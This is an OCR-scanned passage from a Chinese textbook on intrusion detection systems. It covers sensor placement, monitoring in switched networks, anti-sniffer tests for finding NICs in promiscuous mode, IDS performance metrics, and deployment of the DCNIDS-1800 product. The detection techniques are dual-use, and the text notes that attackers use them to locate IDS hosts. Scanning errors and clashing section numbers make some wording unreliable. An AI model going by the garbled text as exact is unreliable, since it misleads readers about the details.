虽然 有 些 攻击 不 能 检测 到 ,但 DMZ 仍然 是 安装 检测 器 的 最 佳 位 置 。 在 该 处 可 以 看 到 
自己 的 站 点 和 防火 墙 暴露 在 多 少 种 攻击 之 下 。 


2. 安装 在 防火 墙 之 内 


如 果 检 测 器 安装 在 防火 墙 之 内 ,就 会 少 受 一 些 干 扰 , 可 以 减少 误 报警 ,也 会 减少 受 攻击 
的 机 会 。 如 果 本 应 该 被 防火 墙 封锁 的 攻击 渗透 进来 ,检测 器 也 可 以 检测 出 来 并 且 还 能 发 现 
防火 墙 的 设置 失误 。 总 之 ,让 防火 墙 去 阻止 大 部 分 的 低层 次 的 攻击 ,才能 使 检测 器 有 充分 的 
时 间 对 付 高 层次 或 更 深入 的 网 络 攻击 。 


3. 防火 墙 内 外 都 安装 检测 器 


如 果 有 足够 的 经 费 在 防火 墙 内 外 都 安装 检测 器 ,自然 有 如 下 优点 : 无 须 猜测 是 否 有 攻 
击 渗透 过 防火 墙 ; 可 以 检测 来 自 内 部 或 外 部 的 攻击 ; 可 以 检测 由 于 设置 有 问题 而 无 法 通过 
防火 墙 的 内 部 系统 ,这 对 系统 管理 员 有 利 。 


4. 检测 器 安装 在 其 他 位 置 


许多 IDS 也 可 以 在 不 同位 置 支 持 系 统 的 检测 工作 。 例 如 ,数据 有 较 高 价值 或 较 敏感 的 
位 置 ; 又 如 有 大 量 不 稳定 的 流动 用 户 的 地 方 或 已 被 当做 攻击 目标 的 子 网 内 。 


9.4.2. 检测 器 应 用 于 交换 机 环境 中 应 注意 的 问题 


检测 器 可 以 在 交换 机 环境 中 工作 ,但 如 果 交 换 机 的 跨 接 端口 没有 正确 设置 ,入 侵 检测 将 
无 法 进行 工作 。 如 果 检 测 器 要 在 交换 网 络 中 工作 ,就 必须 对 它 进行 测试 以 保证 它 能 从 交换 
位 置 可 靠 地 发 送 数据 。 

NIDS 都 是 工作 在 网 卡 混杂 模式 下 ,早期 使 用 集线器 作为 连接 设备 ,NIDS 可 以 监听 到 
网 络 中 所 有 的 数据 包 。 随 着 交换 机 的 大 量 使 用 ,检测 器 必须 配置 两 块 接口 卡 ,一 块 连接 到 网 
络 跨 接 端口 ,用 于 监听 混杂 模式 下 的 数据 包 , 另 一 块 连接 到 单独 的 VLAN, 用 来 与 分 析 工 作 
站 进行 通信 。 

由 于 交换 机 不 采用 共享 信道 的 传送 方法 ,传统 的 嗅 探 器 监听 整个 子 网 的 办 法 不 再 可 行 。 
下 面 是 几 种 可 行 的 解决 办 法 。 

(1) 检测 器 接 到 交换 机 的 核心 芯片 上 的 调试 端口 。 如 果 交 换 机 厂商 把 核心 芯片 的 调试 
端口 开放 出 来 ,用 户 可 将 IDS 系统 接 到 此 端口 上 。 该 端口 可 以 监听 到 任何 其 他 端口 的 进出 
信息 。 这 种 接 法 无 须 改变 IDS 的 体系 结构 ,但 会 降低 交换 机 性 能 。 
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(2) 检测 器 安装 在 交换 机 或 防火 墙 内 部 的 关键 接口 。 这 种 连接 方法 必须 与 其 他 厂商 紧 
密 合作 ,其 优点 是 可 以 得 到 几乎 所 有 的 关键 数据 ,但 它 会 降低 网 络 的 性 能 。 
(3) 采用 分 接 器 (Tap) 将 检测 器 接 到 监测 线路 。 利 用 分 接 器 的 网 络 结构 如 图 9-4 所 示 o 
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图 9-4. 采用 分 接 器 连接 IDS 


这 种 连接 方式 可 以 在 不 降低 网 络 性 能 的 前 提 下 收集 到 所 需 的 信息 。 但 是 , 若 保 护 的 资 
源 众 多 ,IDS 必须 配备 众多 的 额外 设备 (Tap) 。 

(4) 使 用 具有 网 络 接口 检测 功能 的 主机 代理 。 代 理 主 机 的 优点 在 于 可 以 将 被 保护 网 络 
内 部 的 结构 屏蔽 起 来 ,增强 网 络 的 安全 性 能 ,同时 还 可 以 实施 较 强 的 数据 流 监控 .日 志 记录 
和 审计 报告 的 功能 。 从 这 一 点 看 ,NIDS 与 防火 墙 有 类 似 的 地 方 。 但 是 ,它们 是 两 种 作用 不 
同 的 设备 。 

防火 墙 的 作用 是 保护 设备 。 这 意味 着 所 有 网 络 传输 都 必须 通过 防火 墙 才能 从 网 络 的 一 
部 分 传 向 男 一 部 分 。 如 果 防火 墙 受到 攻击 ,其 服务 都 被 破坏 , 则 它 将 会 在 失效 后 关闭 ,也 就 
不 会 有 传输 通过 。 这 样 会 使 所 有 传输 都 中 断 ,并 阻止 攻击 者 趁机 攻击 内 部 主机 。 

NIDS 不 是 位 于 网 络 段 之 间 , 而 被 设计 成 用 于 在 单个 冲突 域 中 隐 含 地 运行 。 如 果 NIDS 
失效 , 它 会 在 失效 后 打开 ,因为 传输 流 并 没有 被 打 断 。 攻 击 者 在 NIDS 失效 后 ,可 以 获得 对 
网 络 资源 的 访问 。 这 就 意味 着 ,在 NIDS 离线 时 ,所 有 的 攻击 行为 都 将 不 会 被 记 入 文档 。 


9.4.3 反 嗅 探 技 术 


当 攻 击 者 成 功 人 侵 系 统 后 ,首先 安装 一 个 嗅 探 器 程序 ,使 网 卡 处 于 混杂 模式 状态 。 这 样 
攻击 者 可 以 得 到 用 户 密码 以 及 信用 卡 账号 ,可 以 窃听 E-mail 等 。 反 嗅 探 器 (antirsniffer) 技 
术 的 目的 就 是 发 现 网 络 中 的 哪些 主机 处 于 混杂 模式 ,通过 这 种 方法 发 现 人 侵 者 。 但 是 ,IDS 
使 用 了 与 sniffer 相同 的 技术 ,也 处 于 混杂 模式 下 。 所 以 ,anti-sniffer 技术 同样 被 攻击 者 利 
用 来 发 现 哪 些 主机 上 安装 了 IDS。 

目前 ,常见 的 anti-sniffer 技术 有 下 面 几 种 。 

(D DNS Test。 这 种 方法 在 网 络 中 产生 大 量 假 的 TCP 连接, 有些 sniffer 程序 会 对 这 
些 JP 地 址 做 反 向 DNS 查询 。 由 于 对 本 来 不 存在 的 IP 地 址 进行 DNS 查询 ,就 使 anti- 
sniffer 通过 监视 这 些 DNS 查询 很 容易 就 能 确定 该 目标 是 否 在 进行 网 络 窃听 。 

(2) Etherping Test。 这 种 测试 方法 是 否 成 功 取决 于 目标 主机 的 操作 系统 。 发 送 一 个 
ICMP Echo 数据 包 到 目标 主机 ,这 个 包 具 有 正确 的 TP 地 址 ,但 是 错误 的 MAC 地 址 会 使 大 
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多 数 的 操作 系统 简单 地 丢弃 该 包 。 由 于 网 卡 处 在 混杂 模式 情况 下 , 某 些 版 本 的 Linux、 
NetBSD, 却 会 响应 具有 错误 MAC 地 址 的 IP 数据 包 。 注 意 ,伪造 的 以 太 网 数据 包 应 将 P 地 
址 设 为 广播 地 址 。 

(3) ARP Test。 向 目标 主机 发 送 一 个 ARP 请 求 ,除了 MAC 地 址 错误 外 ,其 他 信息 都 
正确 ,如 果 目 标 主机 不 处 在 混杂 模式 状态 下 ,那么 它 根 本 见 不 到 该 数据 包 , 和 否则 目标 主机 将 
会 对 该 ARP 请 求 进行 响应 。 

(4) ICMP Ping Latency Test。 这 种 类 型 的 测试 是 最 有 效 的 测试 。 它 能 够 发 现 网 络 中 
处 于 混杂 模式 的 任何 操作 系统 的 计算 机 。 但 是 这 种 测试 会 在 很 短 的 时 间 内 产生 巨大 的 网 络 
通信 流量 。 进 行 这 种 测试 的 理由 是 不 处 于 混杂 模式 的 网 卡 提供 了 一 定 的 硬件 底层 过 滤 机 
制 。 目标 地 址 非 本 地 (广播 地 址 除外 ) 的 数据 包 将 被 网 卡 丢弃 ,而 处 于 混杂 模式 下 的 计算 机 
缺乏 此 类 底层 的 过 滤 ,又 然 增加 的 数据 包 会 使 响应 时 间 变 化 量 超出 平常 1~4 个 数量 级 。 通 
过 向 目标 发 出 ICMP Ping 数据 包 , 再 测试 RTT(round trip time) ,就 可 判断 目标 主机 是 否 
运行 了 sniffer 程序 。 

目前 ,为 了 对 付 攻 击 者 的 多 种 工具 , 由 安全 公司 LOpht 开发 的 AntiSniff 进行 三 种 网 络 
饱和 度 测 试 。 

(1) SIXTYSI 测试 构造 的 数据 包 ,数据 全 为 0x66 。 这 些 数据 包 不 会 被 非 混杂 模式 的 机 器 
接收 ,同时 方便 使 用 常见 的 网 络 监听 或 分 析 工 具 ( 如 Tepdunp 和 Snoop 等 ) 记 录 和 捕获 。 

(2) TCPSYN 测试 构造 的 数据 包 。 这 些 数 据 包 含有 效 的 TCP 头 和 IP 头 ,同时 TCP 标 
志 域 的 SYN 位 被 设置 。 

(3) THREEWAY 测试 构造 的 数据 包 。 与 TCPSYN 测试 的 原理 基本 一 样 ,但 更 复杂 。 
在 该 测试 中 两 个 实际 不 存在 的 机 器 间 多 次 建立 完整 的 TCP 三 次 握手 通信 , 以便 欺 骗 
sniffer。 

AntiSniff 能 够 通过 以 上 三 种 数据 包 测 试 混杂 模式 的 机 器 ,可 以 周期 性 地 进行 测试 并 与 
以 前 的 数据 进行 比较 。 响 应 时 间 测 试 第 一 次 运行 的 数据 还 能 够 用 于 分 析 一 个 大 型 网 络 在 
Flooding 和 非 Flooding 状态 的 性 能 ,并 帮助 管理 员 调 整 网 络 性 能 。 


6.5 入 侵 检测 系统 的 性 能 指标 


对 于 IDS, 用 户 会 关注 每 秒 能 处 理 的 网 络 数据 流量 .每 秒 能 监控 的 网 络 连 接 数 等 指标 。 
但 除了 上 述 指标 外 ,其 实 一 些 不 为 一 般 用 户 了 解 的 指标 也 很 重要 ,其 至 更 重要 ,例如 每 秒 抓 
包 数 ,每 秒 能 够 处 理 的 事件 数 等 。 

(1) 每 秒 数据 流量 (Mbps 或 Gbps)。 每 秒 数据 流量 是 指 网 络 上 每 秒 通过 某 节点 的 数据 
量 。 这 个 指标 是 反应 NIDS 性 能 的 重要 指标 , 一 般 用 Mbps 来 衡量 。 例 如 10Mbps、 
100Mbps 和 1Gbps。 

NIDS 的 基本 工作 原理 是 嗅 探 (sniffer), 它 通过 将 网 卡 设置 为 混杂 模式 ,使 得 网 卡 可 以 
接收 网 络 接口 上 的 所 有 数据 。 

如 果 每 秒 数据 流量 超过 网 络 传感器 的 处 理 能 力 ,NIDS 就 可 能 会 丢 包 , 从 而 不 能 正常 检 
测 攻击 。 但 是 NIDS 是 否 会 丢 包 ,不 主要 取决 于 每 秒 数据 流量 ,而 是 主要 取决 于 每 秒 抓 
包 数 。 
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(2) 每 秒 抓 包 数 (pps)。 每 秒 抓 包 数 是 反映 NIDS 性 能 的 最 重要 的 指标 。 因 为 系统 不 
停 地 从 网 络 上 抓 包 ,对 数据 包 作 分 析 和 处 理 ,查找 其 中 的 入 侵 和 误 用 模式 ,所 以 ,每 秒 所 能 处 
理 的 数据 包 的 多 少 ,反映 了 系统 的 性 能 。 业 界 不 熟悉 IDS 的 往往 把 每 秒 网 络 流量 作为 判断 
NIDS 的 决定 性 指标 ,这 种 想法 是 错误 的 。 每 秒 网 络 流量 等 于 每 秒 抓 包 数 乘 以 网 络 数据 包 
的 平均 大 小 。 网 络 数据 包 的 平均 大 小 差异 很 大 时 ,在 相同 抓 包 率 的 情况 下 ,每 秒 网 络 流量 的 
差异 也 会 很 大 。 例 如 ,网 络 数据 包 的 平均 大 小 为 1024B, 系 统 的 性 能 能 够 支持 10 000pps 的 
每 秒 抓 包 数 ,那么 系统 每 秒 能 够 处 理 的 数据 流量 可 达到 78Mbps, 当 数 据 流量 超过 78Mbps 
时 ,会 因为 系统 处 理 不 过 来 而 出 现 丢 包 现象 ; 如 果 网 络 数据 包 的 平均 大 小 为 512B, 在 
10 000pps 的 每 秒 抓 包 数 的 性 能 情况 下 ,系统 每 秒 能 够 处 理 的 数据 流量 可 达到 40Mbps, 当 
数据 流量 超过 40Mbps 时 ,就 会 因为 系统 处 理 不 过 来 而 出 现 丢 包 现象 。 

在 相同 的 流量 情况 下 ,数据 包 越 小 ,处 理 的 难度 越 大 。 小 包 处 理 能 力 , 也 是 反映 防火 墙 
性 能 的 主要 指标 。 

(3) 每 秒 能 监控 的 网 络 连接 数 。NIDS 不 仅 要 对 单个 的 数据 包 作 检 测 ,还 要 将 相同 网 络 
连接 的 数据 包 组 合 起 来 作 分 析 。 网 络 连接 的 跟踪 能 力 和 数据 包 的 重组 能 力 是 NIDS 进行 协 
议 分 析 、 应 用 层 入 侵 分 析 的 基础 。 这 种 分 析 延 伸 出 很 多 NIDS 的 功能 ,例如 检测 利用 HTTP 
的 攻击 ,敏感 内 容 检测 .邮件 检测 .Telnet 会 话 的 记录 与 回放 、 硬 盘 共 享 的 监控 等 。 

(4) 每 秒 能 够 处 理 的 事件 数 。NIDS 检测 到 网 络 攻击 和 可 疑 事件 后 ,会 生成 安全 事件 或 
称 报警 事件 ,并 将 事件 记录 在 事件 日 志 中 。 每 秒 能 够 处 理 的 事件 数 , 反 映 了 检测 分 析 引 擎 的 
处 理 能 力 和 事件 日 志 记录 的 后 端 处 理 能 力 。 有 的 厂商 将 反映 这 两 种 处 理 能 力 的 指标 分 开 ， 
称 为 事件 处 理 引 擎 的 性 能 参数 和 报警 事件 记录 的 性 能 参数 。 大 多 数 NIDS 报警 事件 记录 的 
性 能 参数 小 于 事件 处 理 引擎 的 性 能 参数 , 主要 是 客户 /服务 器 结构 的 NIDS, 因 为 引入 了 网 
络 通 信 的 性 能 瓶颈 。 这 种 情况 将 导致 事件 的 丢失 ,或 者 控制 台 响 应 不 过 来 。 


8.6 入 侵 检测 系统 的 发 展 趋势 


9.6.1 入 侵 检 测 系统 面临 的 主要 问题 


入 侵 检测 系统 主要 面临 如 下 问题 。 

(1) 误 报 。 误 报 是 指 被 IDS 测 出 但 其 实 是 正常 及 合法 使 用 受 保护 网 络 和 计算 机 的 警 
报 。 假 警报 不 但 令 人 讨厌 ,并 且 降 低 和 人 侵 检测 系统 的 效率 。 攻 击 者 可 以 而 且 往往 是 利用 包 
结构 伪造 无 威胁 正常" 假 警报 ,以 诱 使 收受 人 把 入侵 检测 系统 关 掉 。 

没有 一 个 人 侵 检测 无 敌 于 误 报 ,应 用 系统 总 会 发 生 错误 ,原因 是 : 缺乏 共享 信息 的 标准 
机 制 和 集中 协调 的 机 制 , 不 同 的 网 络 及 主机 有 不 同 的 安全 问题 ,不 同 的 IDS 有 各 自 的 功能 ; 
缺乏 揣摩 数据 在 一 段 时 间 内 行为 的 能 力 ; 缺乏 有 效 跟踪 分 析 等 。 

D 精巧 及 有 组 织 的 攻击 。 攻 击 可 以 来 自 四 方 八 面 ,特别 是 一 群 人 组 织 策 划 且 攻击 者 
技术 高 超 的 攻击 ,攻击 者 花费 很 长 时 间 准 备 ,并 发 动 全 球 性 攻击 ,要 找 出 这 样 复杂 的 攻击 是 
一 件 难 事 。 

另外 ,高 速 网 络 技 术 , 尤 其 是 交换 技术 以 及 加 密 信道 技术 的 发 展 ,使 得 通过 共享 网 段 侦 
听 的 网 络 数 据 采集 方法 显得 不 足 , 而 巨大 的 通信 量 对 数据 分 析 也 提出 了 新 的 要 求 。 
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9.6.2 ”入侵 检测 系统 的 发 展 趋势 


从 总 体 上 讲 , 目 前 除了 传统 的 技术 (模式 识别 和 完整 性 检测 ) 外 ,IDS 应 重点 加 强 与 统计 
分 析 相关 技术 的 研究 。 许 多 学 者 在 研究 新 的 检测 方法 ,如 采用 自动 代理 的 主动 防御 方法 ,将 
免疫 学 原理 应 用 到 入 侵 检 测 的 方法 等 。 其 主要 发 展 方向 可 以 概括 如 下 。 

COD 分 布 式 入 侵 检 测 与 CIDF。 传 统 的 IDS 一般 局 限于 单一 的 主机 或 网 络 架构 ,对 异 构 
系统 及 大 规模 网 络 的 检测 明显 不 足 ,同时 不 同 的 IDS 之 间 不 能 协同 工作 。 为 此 ,需要 分 布 
式 人 侵 检测 技术 与 CIDF。 

(2) 应 用 层 入侵 检测 。 许 多 人 侵 的 语义 只 有 在 应 用 层 才 能 理解 ,而 目前 的 IDS 仅 能 检 
ill Web 之 类 的 通用 协议 ,不 能 处 理 如 Lotus Notes 数据 库 系统 等 其 他 的 应 用 系统 。 许 多 基 
于 客户 /服务 器 结构 .中 间 件 技术 及 对 象 技术 的 大 型 应 用 ,需要 应 用 层 的 入侵 检测 保护 。 

(3) 智能 入 侵 检测 。 目 前 ,入侵 方法 越 来 越 多 样 化 与 综合 化 ,尽管 已 经 有 智能 体系 、 神 
经 网 络 与 遗传 算法 应 用 在 入 侵 检测 领域 ,但 这 些 只 是 一 些 尝试 性 的 研究 工作 ,需要 对 智能 化 
的 人 侵 检测 系统 进一步 研究 ,以 解决 其 自学 习 与 自 适 应 能 力 。 

(4) 与 网 络 安全 技术 相 结 合 。 结 合 防火 墙 .PKIX、 安 全 电子 交易 (SET) 等 网 络 安全 与 
电子 商务 技术 ,提供 完整 的 网 络 安全 保障 。 

(5) 建立 IDS 评价 体系 。 设 计 通 用 的 入 侵 检测 测试 .评估 方法 和 平台 ,实现 对 多 种 IDS 
的 检测 ,已 成 为 当前 IDS 的 另 一 重要 研究 与 发 展 领域 。 评 价 IDS 可 从 检测 范围 .系统 资源 
占用 ,自身 的 可 靠 性 等 方面 进行 ,评价 指标 有 能 否 保证 自身 的 安全 、 运 行 与 维护 系统 的 开销 、 
报警 准确 率 、 负 载 能 力 以 及 可 支持 的 网 络 类 型 .支持 的 入侵 特征 数 、 是 否 支 持 IP 碎片 重组 、 
是 否 支 持 TCP 流 重组 等 。 

总 之 ,IDS 作为 一 种 主动 的 安全 防护 技术 ,提供 了 对 内 部 攻击 、 外 部 攻击 和 误 操作 的 实 
时 保护 ,在 网 络 系统 受到 危害 之 前 拦截 和 响应 入侵 。 随 着 网 络 通信 技术 安全 性 的 要 求 越 来 
越 高 ,为 给 电子 商务 等 网 络 应 用 提供 可 靠 服务 ,而 由 于 IDS 能 够 从 网 络 安全 的 立体 纵深 ,多 
层次 防御 的 角度 出 发 提供 安全 服务 , 必 将 进一步 受到 人 们 的 高 度 重视 。 


6.7 入 侵 检测 系统 的 部 团 


下 面 以 神州 数码 DCNIDS-1800 IDS 为 例 介绍 人 侵 检 测 系 统 神州 数码 的 组 件 和 部 署 。 
9.7.1 DCNIDS-1800 入 侵 检 测 系 统 组 件 


DCNIDS-1800 IDS 是 自动 的 ,实时 的 网 络 入 侵 检 测 和 响应 系统 , 它 采 用 了 新 一 代 的 入 
侵 检 测 技术 ,包括 基于 状态 的 应 用 层 协 议 分 析 技术 .开放 灵活 的 行为 描述 代码 、 安 全 的 嵌入 
式 操作 系统 .先进 的 体系 架构 .丰富 完善 的 各 种 功能 ,配合 高 性 能 专用 硬件 设备 ,是 最 先进 的 
NIDS。 它 以 不 引 人 注 目的 方式 最 大 限度 地 、 全 天 候 地 监控 和 分 析 企业 网 络 的 安全 问题 。 捕 
获 安全 事件 ,给 予 适当 的 响应 ,阻止 非法 的 入侵 行为 ,保护 企业 的 信息 组 件 。 

DCNIDS-1800 IDS 采用 多 层 分 布 式 体系 结构 ,由 下 列 程序 组 件 组 成 : 控制 台 、EC、 
LogServer 传感器 ,报表 ,如 表 9-2 所 示 。 
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表 9-2 DCNIDS-1800 入 侵 检测 系统 组 件 
说 明 


Console 


(控制 台 ) 


控制 台 是 DCNIDS-1800 和 人 侵 检 测 系统 的 控制 和 管理 组 件 。 它 是 一 个 基于 
Windows 的 应 用 程序 .控制 台 提供 图 形 用 户 界面 来 进行 数据 查询 查看 警报 并 配 
置 传感器 。 控 制 台 有 很 好 的 访问 控制 机 制 ,不 同 的 用 户 被 授予 不 同 级 别 的 访问 
权限 ,允许 或 禁止 查询 ,警报 及 配置 等 访问 。 控 制 台 、 事 件 收集 器 和 传感器 之 间 
的 所 有 通信 都 进行 了 安全 加 密 


EventCollector 


(事件 收集 器 ) 


LogServer 


(数据 服务 器 ) 


Sensor 


(传感器 ) 


Report 
(报表 ) 和 查询 工具 


一 个 大 型 分 布 式 应 用 中 ,用 户 希 望 能 够 通过 单个 控制 台 完 全 管理 多 个 传感器 , 允 
许 从 一 个 中 央 点 分 发 安全 策略 ,或 者 把 多 个 传感器 上 的 数据 合并 到 一 个 报告 中 
去 。 用 户 可 以 通过 安装 一 个 事件 收集 器 来 实现 集中 管理 传感器 及 其 数据 。 事 件 
收集 器 还 可 以 控制 传感器 的 启动 和 停止 ,收集 传感器 日 志 信息 ,并 且 把 相应 的 策 
略 发 送 给 传感器 ,以 及 管理 用 户 权限 .提供 对 用 户 操作 的 审计 功能 。IDS 服务 管 
理 的 基本 功能 是 负责 “事件 收集 服务 ”和 * 安 全 事件 响应 服务 "的 起 停 控 制 、 服 务 
状态 的 显示 

LogServer 是 DCNIDS-1800 入 侵 检 测 系统 的 数据 处 理 模块 。LogServer 需要 集 
成 DB( 数 据 库 ) 一 起 协同 工作 。DB( 数 据 库 ) 是 一 个 第 三 方 数据 库 软件 。 
DCNIDS-1800 入 侵 检测 系统 7.1 支持 微软 MSDE,SQL Server, 支 持 MySQL 和 
Oracle 数据 库 ,根据 部 署 规模 和 需求 可 以 选择 其 中 之 一 作为 数据 库 

部 署 在 需要 保护 的 网 段 上 ,对 网 段 上 流 过 的 数据 流 进行 检测 ,识别 攻击 特征 , 报 
告 可 疑 事 件 ,阻止 攻击 事件 的 进一步 发 生 或 给 予 其 他 相应 的 响应 
Report( 报 表 ) 和 查询 工具 作为 IDS 系统 的 一 个 独立 的 部 分 ,主要 完成 从 数据 库 
提取 数据 、 统 计数 据 和 显示 数据 的 功能 。Report 能 够 关联 多 个 数据 库 ,给 出 一 份 
综合 的 数据 报表 。 查 询 工 具 提 供 查 询 安 全 事件 的 详细 信息 


9.7.2 ”部署 DCNIDS-1800 入 侵 检 测 系 统 


1. 传感器 


作为 一 种 NIDS,DCNIDS-1800 IDS 依赖 于 一 个 或 多 个 传感器 监测 网 络 数据 流 。 这 些 
传感器 代表 着 DCNIDS-1800 IDS 的 眼睛 。 因 此 ,传感器 在 某 些 重要 位 置 的 部 署 对 于 
DCNIDS-1800 IDS 能 否 发 挥 作用 至 关 重要 。 


2. 部 署 准备 


1) 分 析 网 络 拓扑 图 结构 

攻击 者 可 能 会 对 我 们 的 网 络 中 的 任何 可 用 资源 发 起 攻击 。 分 析 网 络 拓扑 结构 对 于 定义 
我 们 的 所 有 资源 是 至 关 重 要 的 。 而 且 , 定 义 想 要 保护 的 信息 和 资源 ,是 创建 一 个 传感器 部 团 
计划 的 第 一 步 。 除 非 对 我 们 的 网 络 拓扑 结构 有 非常 透彻 的 理解 ,否则 我 们 不 可 能 全 面 地 识 
别 需要 保护 的 所 有 网 络 资源 。 

当 分 析 我 们 的 网 络 拓扑 结构 时 ,必须 考虑 很 多 因素 : 

。 数据 通过 网 络 入 口 点 进入 我 们 的 网 络 , 所 有 这 些 点 都 可 能 被 攻击 者 利用 ,在 这 些 潜 

在 位 置 获取 网 络 的 访问 权限 ; 
，。 需要 验证 每 一 个 人 口 点 都 得 到 了 严密 的 监视 ; 
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。 如 果 没 有 对 进入 我 们 网 络 的 入 口 点 进行 监视 ,就 会 允许 攻击 者 穿 透 我 们 未 被 IDS 保 
护 的 网 络 。 

大 多 数 网 络 的 常见 入 口 点 如 下 。 

(1) Internet 入口 点 。 我 们 的 网 络 的 Internet 连接 使 得 我 们 的 网 络 对 于 整个 Internet 
都 是 可 见 的 。 通 过 这 个 人口 点 ,全 世界 的 黑客 都 可 以 尝试 获得 对 我 们 网 络 的 访问 权 。 对 于 
大 多 数 企业 网 络 来 讲 , 对 Internet 的 访问 是 直接 通过 一 台 路 由 器 进行 的 。 这 台 设 备 被 称 为 
边界 路 由 器 (perimeter router)。 通 过 在 这 台 设 备 后 面 放置 一 个 传感器 ,就 可 以 监视 流向 企 
业 网 络 的 全 部 数据 流 ( 其 中 包括 攻击 数据 流 )。 如 果 我 们 的 网 络 包含 多 个 边界 路 由 器 ,就 可 
能 需要 使 用 多 个 传感器 ,每 个 传感器 负责 监视 进入 网 络 的 每 一 个 Internet 入口 点 。 

(2) Extranet 人 口 点 。 许 多 企业 网 络 都 有 到 商业 伙伴 网 络 的 特殊 连接 。 来 自 这 些 商业 
伙伴 网 络 的 数据 流 并 不 总 是 通过 我 们 网 络 的 边界 设备 ; 因此 ,重要 的 是 要 确定 这 些 入 口 点 
也 被 有 效 地 进行 监视 。 攻 击 者 可 以 通过 穿 透 我 们 商业 伙伴 的 网 络 ,利用 Extranet 来 渗透 到 
我 们 的 网 络 中 。 通 常 ,我 们 对 商业 伙伴 网 络 的 安全 只 能 进行 极 少 的 控制 ,或 者 根本 不 能 进行 
控制 。 而 且 , 如 果 攻 击 者 穿 透 了 我 们 的 网 络 , 然 后 利用 Extranet 连接 来 攻击 我 们 的 一 个 商 
业 伙 伴 , 我 们 就 可 能 面临 承担 责任 的 问题 。 

(3) Intranet 隔离 点 。Intranet 代表 我 们 网 络 中 的 内 部 各 部 分 。 这 些 部 分 可 能 是 按照 
机 构 或 者 功能 划分 的 。 有 时 候 , 我 们 网 络 中 的 不 同 部 门 可 能 会 有 不 同 的 安全 需求 ,这 取决 于 
他 们 需要 访问 或 保护 的 数据 和 资源 。 通 常 ,这些 内 部 部 分 已 经 被 防火 墙 隔离 开 了 ,在 不 同 的 
网 络 之 间 划 分 不 同 的 安全 级 别 。 有 时 ,网 络 管理 者 使 用 网 段 之 间 的 路 由 器 访问 控制 列表 
(ACL) 来 强制 分 离 出 安全 区 域 。 在 这 些 网 络 之 间 放 置 一 个 传感器 (在 防火 墙 或 路 由 器 的 前 
面 ) ,可 以 让 我 们 监视 分 离 的 安全 区 域 之 间 的 数据 流 ,并 验证 是 否 符合 我 们 定义 的 安全 策略 。 

有 时 ,我们 可 能 还 想 在 相互 间 具 有 完全 访问 权限 的 网 段 之 间 安 装 一 个 传感器 。 在 这 种 
情况 下 ,我 们 想 让 传感器 监视 不 同 网 络 之 间 的 数据 流 类 型 ,即使 在 缺 省 情况 下 ,我 们 还 没有 
对 数据 流 建立 任何 物理 屏障 ,但 是 ,这 两 个 网 络 之 间 的 任何 攻击 者 都 可 以 被 很 快 地 检测 
出 来 。 

(4) 远程 访问 入口 点 。 大 多 数 网 络 都 提供 了 一 种 方式 ,可 以 通过 一 条 拨号 电话 线 访问 
网 络 。 这 种 接 人 方式 可 以 允许 企业 的 用 户 访问 网 络 的 某 些 功能 ,比如 在 离开 办 公 室 的 时 候 
收发 电子 邮件 。 虽 然 这 种 增强 的 功能 非常 有 用 ,但 是 它 同 时 也 为 攻击 者 打开 了 一 个 可 以 利 
用 的 漏洞 。 我 们 可 能 需要 使 用 一 个 传感器 来 监视 来 自 远程 接 人 服务 器 的 网 络 数据 流 , 以 防 
黑客 可 能 会 攻破 我 们 的 远程 访问 认证 机 制 。 

许多 远程 用 户 使 用 家 庭 系统 ,通过 高 速 Internet 连接 ,比如 电缆 调制 解 调 器 ,进行 不 断 
线 的 连接 。 由 于 这 些 系统 的 保护 措施 通常 很 少 ,攻击 者 经 常 以 这 些 家 庭 系统 作为 目标 ,并 发 
动 攻击 ,这 样 还 可 能 会 对 我 们 的 远程 访问 机 制 带 来 危害 。 有 时 候 , 偷 来 的 笔记 本 计算 机 可 能 
会 泄露 大 量 的 关于 如 何 访问 我 们 的 网 络 的 信息 。 因 此 ,即使 我 们 信任 我 们 的 用 户 和 远程 访 
问 机 制 ,最 好 还 是 利用 IDS 传感器 对 我 们 的 远程 接 入 服务 器 进行 监视 。 

2) 关键 网 络 组 件 

确定 我 们 网 络 上 的 关键 组 件 , 这 对 于 综合 分 析 我 们 的 网 络 拓扑 来 讲 是 非常 关键 的 。 黑 
客 通常 将 查看 到 我 们 的 关键 网 络 组 件 作 为 胜利 。 如 果 关 键 组 件 的 安全 受到 威胁 ,就 将 为 整 
个 网 络 带 来 巨大 的 威胁 。 需 要 在 整个 网 络 中 采用 传感器 ,来 确保 可 以 检测 到 对 这 些 关 键 组 
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件 发 动 的 攻击 ,并 在 一 定 条 件 下 ,通过 阻塞 (也 被 称 为 设备 管理 ) 来 中 止 这 些 攻击 。 注 意 : IH 
塞 ,或 设备 管理 ,是 指 IDS 传感器 可 以 动态 更 新 路 由 器 上 的 访问 控制 列表 ,来 阻塞 来 自 一 台 
攻击 主机 的 当前 和 未 来 的 数据 流 , 防 止 这 些 数据 流 进 入 到 路 由 器 中 。 

关键 网 络 组 件 分 为 下 列 几 类 。 

CD 服务 器 。 网 络 服务 器 代表 了 我 们 网 络 中 的 骨干 设备 。 我 们 的 服务 器 提供 的 典型 服 
务 包括 名 字 和 解析、 认证 .电子 邮件 和 企业 的 网 页 。 对 这 些 有 价值 的 网 络 组 件 的 访问 进行 监 
视 , 对 于 一 个 综合 的 安全 策略 来 说 是 非常 关键 的 。 

在 一 个 典型 的 网 络 上 存在 许多 服务 器 。 常 见 的 服务 器 有 DNS 服务 器 .DHCP 服务 器 、 
HTTP 服务 器 .Windows 域 控制 台 .CA 服务 器 ,电子 邮件 服务 器 、NFS 服务 器 。 

(2) 基础 设施 。 网 络 基础 设施 是 指 那些 在 网 络 上 的 主机 之 间 传 送 数据 或 数据 包 的 设 
备 。 常 见 的 基础 设备 包括 路 由 器 、 交 换 机 、 网 关 和 集线器 。 如 果 没 有 这 些 设 备 , 网 络 上 的 每 
台 主 机 都 会 成 为 互相 隔离 的 实体 ,互相 之 间 不 能 进行 通信 。 

路 由 器 在 不 同 的 网 段 之 间 传 送 数据 流 。 当 路 由 器 停止 工作 时 ,互相 连接 的 网 络 之 间 的 
数据 流 也 就 停止 流动 了 。 网 络 可 能 是 由 几 个 内 部 路 由 器 和 一 个 或 多 个 边界 路 由 器 组 成 的 。 
交换 机 在 位 于 相同 网 段 的 主机 之 间 传 送 数据 流 。 交 换 机 通过 只 向 交换 机 上 的 特定 端口 发 送 
非 广播 数据 流 ,提供 了 最 小 的 安全 性 。 如 果 交 换 机 被 禁用 , 它 就 会 停止 发 送 数据 流 , 导致 
